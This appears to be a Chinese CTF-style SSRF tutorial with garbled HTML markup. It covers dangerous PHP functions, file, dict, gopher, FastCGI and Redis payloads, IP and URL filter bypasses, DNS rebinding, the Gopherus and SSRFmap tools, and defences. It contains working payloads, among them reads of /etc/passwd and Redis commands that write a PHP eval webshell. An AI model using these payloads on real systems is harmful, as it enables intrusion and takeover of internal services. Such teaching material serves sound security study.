SSRF漏洞全面分析与利用指南<\/h1>

一、SSRF基础概念<\/h2>
SSRF (Server-Side Request Forgery)<\/strong> 服务端请求伪造漏洞，是指攻击者能够通过服务器发起任意网络请求的一种安全漏洞。当服务端提供了从其他服务器获取数据的功能，但未对目标地址做严格过滤时，攻击者可构造恶意请求访问内网服务或本地资源。<\/p>

漏洞成因<\/h3>

服务端未对用户提供的URL进行充分验证和过滤<\/li>
服务器能够发起网络请求并返回响应数据<\/li>
攻击者可控制请求的目标地址<\/li> <\/ul>
常见危险函数<\/h3>

file_get_contents()<\/code> - 将文件或URL内容读入字符串<\/li>
readfile()<\/code> - 输出文件内容<\/li>
fsockopen()<\/code> - 打开网络或Unix套接字连接<\/li>
curl_exec()<\/code> - 执行cURL会话<\/li>
fopen()<\/code> - 打开文件或URL<\/li> <\/ol> 二、SSRF利用协议分析<\/h2> 1. HTTP协议<\/h3> 用途<\/strong>：访问内网Web服务，读取敏感信息<\/p> ?<\/span>url<\/span>=<\/span>http<\/span>:\/\/<\/span>127.0<\/span>.<\/span>0.1<\/span>\/<\/span>flag<\/span>.<\/span>php<\/span> <\/span><\/span><\/code><\/pre>2. DICT协议<\/h3> 用途<\/strong>：探测内网主机存活和端口开放情况<\/p> ?<\/span>url<\/span>=<\/span>dict<\/span>:\/\/<\/span>127.0<\/span>.<\/span>0.1<\/span>:<\/span>6379<\/span>\/<\/span>info<\/span> # 探测Redis服务 <\/span><\/span><\/span><\/code><\/pre>3. FILE协议<\/h3> 用途<\/strong>：读取服务器本地文件<\/p> ?<\/span>url<\/span>=<\/span>file<\/span>:\/\/\/<\/span>etc<\/span>\/<\/span>passwd<\/span> <\/span><\/span>?<\/span>url<\/span>=<\/span>file<\/span>:\/\/\/<\/span>var<\/span>\/<\/span>www<\/span>\/<\/span>html<\/span>\/<\/span>config<\/span>.<\/span>php<\/span> <\/span><\/span><\/code><\/pre>4. GOPHER协议<\/h3> 用途<\/strong>：构造任意协议请求，攻击内网服务<\/p> 特点<\/strong>：<\/p> 可构造GET\/POST请求<\/li> 回车换行需使用%0d%0a<\/code><\/li> 参数间的&<\/code>需URL编码<\/li> <\/ul> 示例<\/strong> - 构造POST请求：<\/p> gopher:\/\/127.0.0.1:80\/_POST%20\/flag.php%20HTTP\/1.1%0d%0a Host:%20127.0.0.1%0d%0a Content-Type:%20application\/x-www-form-urlencoded%0d%0a Content-Length:%2036%0d%0a %0d%0a key=c384d200658f258e5b5c681bf0aa29a8%0d%0a <\/code><\/pre> 5. FastCGI协议<\/h3> 用途<\/strong>：攻击PHP-FPM服务(默认端口9000)<\/p> 利用步骤<\/strong>：<\/p> 使用工具生成攻击payload<\/li> 编码后通过SSRF发送<\/li> <\/ol> python gopherus.<\/span>py --<\/span>exploit fastcgi \/<\/span>var\/<\/span>www\/<\/span>html\/<\/span>index.<\/span>php <\/span><\/span><\/code><\/pre>6. Redis协议<\/h3> 用途<\/strong>：攻击未授权Redis服务(默认端口6379)<\/p> 攻击方式<\/strong>：<\/p> 写入Webshell<\/li> 写入SSH公钥<\/li> 主从复制RCE<\/li> <\/ol> Redis命令示例<\/strong>：<\/p> flushall set 1 '<?php eval($_POST["cmd"]);?>' config set dir \/var\/www\/html config set dbfilename shell.php save <\/code><\/pre> 三、SSRF绕过技术<\/h2> 1. URL绕过<\/h3> 场景<\/strong>：要求URL包含特定域名<\/p> ?<\/span>url<\/span>=<\/span>http<\/span>:\/\/<\/span>notfound<\/span>.<\/span>ctfhub<\/span>.<\/span>com<\/span>@<\/span>127.0<\/span>.<\/span>0.1<\/span>\/<\/span>flag<\/span>.<\/span>php<\/span> <\/span><\/span>?<\/span>url<\/span>=<\/span>http<\/span>:\/\/<\/span>notfound<\/span>.<\/span>ctfhub<\/span>@<\/span>127.0<\/span>.<\/span>0.1<\/span>\/<\/span>flag<\/span>.<\/span>php<\/span>.<\/span>com<\/span> <\/span><\/span><\/code><\/pre>2. 数字IP绕过<\/h3> 场景<\/strong>：过滤点分十进制IP<\/p> ?<\/span>url<\/span>=<\/span>http<\/span>:\/\/<\/span>0x7f<\/span>.<\/span>0.0<\/span>.<\/span>1<\/span>\/<\/span>flag<\/span>.<\/span>php<\/span> # 十六进制 <\/span><\/span><\/span><\/span>?<\/span>url<\/span>=<\/span>http<\/span>:\/\/<\/span>0177.0<\/span>.<\/span>0.1<\/span>\/<\/span>flag<\/span>.<\/span>php<\/span> # 八进制 <\/span><\/span><\/span><\/span>?<\/span>url<\/span>=<\/span>http<\/span>:\/\/<\/span>2130706433<\/span>\/<\/span>flag<\/span>.<\/span>php<\/span> # 十进制 <\/span><\/span><\/span><\/span>?<\/span>url<\/span>=<\/span>http<\/span>:\/\/<\/span>0<\/span>\/<\/span>flag<\/span>.<\/span>php<\/span> # 短地址 <\/span><\/span><\/span><\/code><\/pre>3. 302跳转绕过<\/h3> 场景<\/strong>：IP地址被过滤<\/p> 在可控服务器设置302跳转<\/li> <\/ol> <?<\/span>php<\/span> header<\/span>("Location: http:\/\/127.0.0.1\/flag.php"<\/span>); ?><\/span> <\/span><\/span><\/span><\/code><\/pre> 通过SSRF访问跳转页面<\/li> <\/ol> 4. DNS重绑定<\/h3> 原理<\/strong>：利用DNS解析变化绕过IP检查<\/p> 使用DNS重绑定服务(如rebinder.xyz)<\/li> 域名首次解析为外网IP通过检查<\/li> 后续解析为127.0.0.1实现内网访问<\/li> <\/ol> 四、自动化利用工具<\/h2> Gopherus<\/h3> 功能<\/strong>：生成各种协议的SSRF攻击payload<\/p> # FastCGI攻击<\/span> <\/span><\/span>python gopherus.py --exploit fastcgi \/var\/www\/html\/index.php <\/span><\/span> <\/span><\/span># Redis攻击<\/span> <\/span><\/span>python gopherus.py --exploit redis <\/span><\/span><\/code><\/pre>SSRFmap<\/h3> 功能<\/strong>：自动化SSRF漏洞扫描和利用<\/p> python ssrfmap.py -r data\/request.txt -p url -m portscan <\/span><\/span><\/code><\/pre>五、防御措施<\/h2> 输入验证<\/strong>：<\/p> 白名单域名\/IP<\/li> 禁止内网IP段(127.0.0.0\/8, 10.0.0.0\/8等)<\/li> <\/ul> <\/li> 协议限制<\/strong>：<\/p> 仅允许HTTP\/HTTPS<\/li> 禁用file、gopher、dict等危险协议<\/li> <\/ul> <\/li> 网络层防护<\/strong>：<\/p> 禁止服务器访问非必要内网服务<\/li> 设置网络访问控制列表(ACL)<\/li> <\/ul> <\/li> 其他措施<\/strong>：<\/p> 禁用CURLOPT_FOLLOWLOCATION<\/li> 设置CURLOPT_PROTOCOLS限制协议<\/li> 启用DNS缓存防止重绑定<\/li> <\/ul> <\/li> <\/ol> 六、实战利用思路<\/h2> 信息收集<\/strong>：<\/p> 使用file协议读取配置文件<\/li> 通过http\/dict探测内网服务<\/li> <\/ul> <\/li> 服务识别<\/strong>：<\/p> 端口扫描识别Redis\/MySQL\/FastCGI等服务<\/li> <\/ul> <\/li> 漏洞利用<\/strong>：<\/p> Redis未授权→写Webshell\/SSH key<\/li> FastCGI→PHP代码执行<\/li> MySQL→文件读取\/写入<\/li> <\/ul> <\/li> 权限提升<\/strong>：<\/p> 读取敏感文件(\/etc\/passwd, ~\/.ssh\/)<\/li> 利用服务漏洞获取更高权限<\/li> <\/ul> <\/li> <\/ol> 附录：参考资源<\/h2> SSRF漏洞的利用与攻击内网应用<\/a><\/li> SSRF漏洞从入门到精通<\/a><\/li> SSRF漏洞挖掘与利用技巧<\/a><\/li> <\/ol>